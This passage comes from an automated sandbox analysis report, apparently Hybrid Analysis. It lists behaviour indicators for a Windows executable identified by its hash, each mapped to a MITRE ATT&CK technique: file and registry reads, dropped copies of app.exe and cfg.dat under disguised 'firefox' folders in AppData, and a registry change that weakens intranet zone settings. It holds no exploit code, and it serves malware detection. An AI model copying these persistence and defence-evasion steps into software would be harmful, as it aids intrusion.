\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" connecting to \"\\ThemeApiPort\"\n \"app.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\version.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe.Local\\\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe.Local\\\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"\\SystemRoot\\WinSxS\\FileMaps\\users_%OSUSER%_appdata_roaming_firefox_tsms_d305780f36765c2e.cdf-ms\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe:Zone.Identifier\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\FA1C16A3024D35EBC4F6996D1791EAD89A08DAE2EBD87E39C9997C04613C4645.EXE.LOCAL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\DESKTOP.INI\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\DESKTOP.INI\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\DESKTOP.INI\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"app.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"\n \"app.exe\" touched file \"C:\\Program Files\\7-Zip\\Lang\\en.txt\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\firefox tsms\\app.exe\"\n \"app.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\firefox mssd\\cfg.dat\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" writes file \"%appdata%\\firefox tsms\\app.exe\"\n \"app.exe\" writes file \"%appdata%\\firefox mssd\\cfg.dat\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"app.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox mssd\\cfg.dat\"\n \"app.exe\" writes a file \"%APPDATA%\\firefox mssd\\cfg.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"START_MINMFU\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\JVAJBEQ.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.JVAQBJF.PBAGEBYCNARY\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\ZFCHO.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\CBJRECAG.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\RKPRY.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\ZFNPPRFF.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG BSSVPR\\BSSVPR14\\BHGYBBX.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\ZVPEBFBSG FVYIREYVTUG\\5.1.50907.0\\FVYIREYVTUG.PBASVTHENGVBA.RKR\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.VAGREARGRKCYBERE.QRSNHYG\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"app.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\firefox tsms\\app.exe]- [targetUID: 00000000-00004436]\n \"cfg.dat\" has type \"data\"- Location: [%APPDATA%\\firefox mssd\\cfg.dat]- [targetUID: 00000000-00002452]\n \"app.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadResource with parameter {'hModule': '1862336512', 'hResInfo': '1862344832'}\" (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadResource with parameter {'hModule': '268435456', 'hResInfo': '268493040'}\" (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadResource with parameter {'hModule': '1888157696', 'hResInfo': '1888270608'}\" (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadResource with parameter {'hModule': '45547521', 'hResInfo': '45673952'}\" (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadResource with parameter {'hModule': '45547521', 'hResInfo': '45647952'}\" (UID: 00000000-00004436)\n \"app.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4686168'}\" (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindResourceW\" with parameter \"789\" - (UID: 00000000-00004436)\n \"app.exe\" called \"FindResourceA\" with parameter \"4644252\" - (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9477e0cb24000050fd7f9a5c807700f0fd7f90c812004450fd7f00000000400000003f000000200000000050fd7f84c81200c15c807760828777200000000050fd7f9a5c807700f0fd7fa8c8120057897f778083877713177875d8eb9477 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b20310000f4482800100000001c000000b8e01200bce112007ac8726f08000000ac4e7e7793797775ffffffff20e11200000000000ce112000010000004000000002000002ce11200bf797775ffffffff0000520200005202001000000400000064e11200000013006ee9466f00005202ff000000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b20310000f4482800100000001c000000b8e01200bce112007ac8726f08000000ac4e7e7793797775ffffffff20e11200000000000ce112000010000004000000002000002ce11200bf797775ffffffff0000520200005202001000000400000064e11200000013006ee9466f (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b20310000f4482800100000001c000000b8e01200bce112007ac8726f08000000ac4e7e7793797775ffffffff20e11200000000000ce112000010000004000000002000002ce11200bf797775ffffffff0000520200005202001000000400000064e11200 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called 